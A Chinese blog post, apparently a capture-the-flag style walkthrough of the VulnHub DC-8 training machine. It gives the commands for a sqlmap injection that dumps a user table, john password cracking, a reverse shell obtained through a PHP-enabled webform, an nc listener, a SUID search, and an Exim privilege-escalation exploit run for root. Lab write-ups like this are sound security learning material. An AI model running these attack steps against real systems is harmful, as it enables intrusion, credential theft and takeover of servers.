vulnhub dc-8

已于 2023-06-09 11:29:37 修改
阅读量720 收藏
点赞数
分类专栏: 靶机及靶场通关 文章标签: php 开发语言 网络安全
于 2023-05-30 15:47:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/130949602
版权

1.信息搜集
端口 22,80,31337
存活ip 192.168.85.136
2.访问网站,进行信息搜集
在欢迎页面发现sql注入
在这里插入图片描述
sqlmap进行跑数据

python sqlmap.py -u "http://192.168.85.136/?nid=1" --batch -D d7db -T users -C name,pass --dump

在这里插入图片描述
尝试robots.txt,发现后他登录页面/user/login

3.使用john进行破解密码
密文写入1.txt,只爆出john密码 turtle

john 1.txt

4.登录后台反弹shell

在这里插入图片描述
这个地方上传图片,有大小限制,且没找到文件包含
在Contact Us —Webfrom—Form settings可以写php代码,文件类型改为php代码,保存即可
在这里插入图片描述
在Contact Us处写入内容,邮箱点击提交

5.进行信息搜集
kali成功监听

nc -lvvp 4455
python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
家目录,tmp目录没发现有用的信息

6.尝试进行suid提权

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
查看安装版本

dpkg -l | grep exim

kali查找exim4 exp

searchsploit exim

在这里插入图片描述
上传46996.sh
执行

./46996.sh -m netcat

提权成功
在这里插入图片描述
dc-8
linux第三方提权

mushangqiujin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub DC-1
weixin_45682839的博客
04-13 320
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub DC-8
Pai_Space
04-05 990
明确:《中华人民共和国网络安全法》 Description DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of conce..
vulnhub DC-8靶机实战
m0_51195235的博客
12-01 510
vulnhub DC-8靶机实战
Vulnhub DC-5
Pai_Space
02-20 266
Description DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with.
VulnHub DC-8
Lee_yc的博客
09-24 268
先在kali上修改这个文件的格式,再临时开启kali的http服务,使靶机可以在kali上将文件下载下来。将脚本下载到靶机上之后发现运行不了,原因是这个脚本的格式是dos,要修改为unix格式才行。将两列的账号密码保存到一个文件,格式如下,使用john进行爆破。在靶机上将文件下载下来,下载到/tmp目录下,当前目录下载会失败。执行脚本,发现执行失败,查看发现没有执行权限,为文件赋予执行权。查看系统的版本信息,用户信息、内核信息,发现并没有可以利用的。利用exim4,查询exim4的版本,版本是4.89。
vulnhub DC-4靶机实战
m0_51195235的博客
10-04 2239
vulnhub DC-4靶机实战
Vulnhub DC-6
Pai_Space
03-11 765
Description DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn't an overly difficult challenge so should be great for beginners. The ultimate goal of this challenge is to g.
Vulnhub DC-7
Pai_Space
03-26 5279
明确:《中华人民共和国网络安全法》 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn't an overly technical challenge, it isn't exactly easy. While it's kind of a logic..
Vulnhub dc-2靶机 详解 易懂
Lee_yc的博客
08-21 494
​ 下载地址:DC: 2 ~ VulnHub 下载完成后直接使用虚拟机打开就可以了,注意把靶机设置为NAT模式
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
dc-dc仿真电路 multisim
10-31
DC-DC仿真电路在Multisim软件中是一种用于模拟和调试DC-DC转换器的工具。它可以帮助工程师在设计和优化DC-DC转换器时进行电路仿真和性能分析。 首先,我们可以在Multisim中选择合适的电路元件来构建DC-DC转换器的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值